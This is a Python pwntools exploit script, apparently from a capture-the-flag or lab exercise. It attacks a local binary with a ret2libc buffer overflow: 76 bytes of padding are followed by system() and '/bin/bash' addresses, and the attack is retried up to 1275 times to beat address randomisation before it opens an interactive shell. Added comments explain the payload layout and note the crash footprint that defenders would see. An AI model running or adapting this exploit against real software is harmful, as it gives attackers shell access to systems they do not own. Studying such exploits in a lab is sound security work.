#!/usr/bin/env python
from pwn import *
import time
import locations
def hexify(hex_number):
    """Return the one-character string whose code point is *hex_number*.

    *hex_number* is a string of hexadecimal digits without a prefix
    (for example ``"41"``); ``"0x"`` is prepended before parsing in base 16.
    Raises ValueError if the resulting text is not a valid hex literal.
    """
    code_point = int("0x" + hex_number, 16)
    return chr(code_point)
def reverse(add):
    """Return the four bytes encoded in *add* as a 4-character string, reversed.

    The first two characters of *add* are skipped (presumably a "0x"
    prefix), and the next eight characters are read as four two-digit hex
    groups. Each group is converted with hexify() and the groups are joined
    in reverse order, so the least-significant byte comes first.
    """
    # Offsets 2, 4, 6, 8 select the four two-digit groups after the prefix.
    byte_chars = [hexify(add[start:start + 2]) for start in range(2, 10, 2)]
    return ''.join(reversed(byte_chars))
# NOTE(review): the extracted listing lost its indentation; the nesting below
# is a reconstruction and should be confirmed against the original file.

# Byte-reversed forms of two values from the project-local `locations` module
# (not shown here). Presumably these are "0x"-prefixed hex address strings for
# system() and a "/bin/bash" string in the target's libc -- TODO confirm.
system_address = reverse(locations.system)
binbash_address = reverse(locations.binbash)
# Substrings searched for in the target's output. They look like fragments of
# glibc abort, stack-protector and assertion diagnostics, i.e. signs that the
# process crashed rather than continued.
bad_words = ['glibc','stack smashing','Assertion']
# Up to 255*5 = 1275 attempts, each against a freshly spawned ./main.
# NOTE(review): retrying with unchanged constants only makes sense if the
# target's memory layout differs between runs; presumably this depends on
# address randomisation with little entropy -- confirm. From a detection
# standpoint, a burst of short-lived crashes of one binary is the visible
# footprint of this loop.
for x in range(0,255*5):
    io = process('./main')
    padding = "A"*76
    # Input layout: 76 filler bytes, first value, 4 filler bytes, second value.
    exploit = padding + system_address + "A"*4 + binbash_address
    io.sendline(exploit)
    io.sendline("ls")
    # Two lines of output are read and discarded.
    buff = io.recvline()
    buff = io.recvline()
    # Only inspect further output if some is available right now.
    if io.can_recv():
        a = io.recvline()
        print("A", a)
        # The attempt counts as a crash if any marker appears in the line.
        found_bad_word = False
        for bad_word in bad_words:
            if bad_word in a:
                found_bad_word = True
        # No crash marker: hand the session to the user and stop retrying.
        if found_bad_word is False:
            io.interactive()
            break
    # Tear down this attempt's process before the next iteration.
    io.close()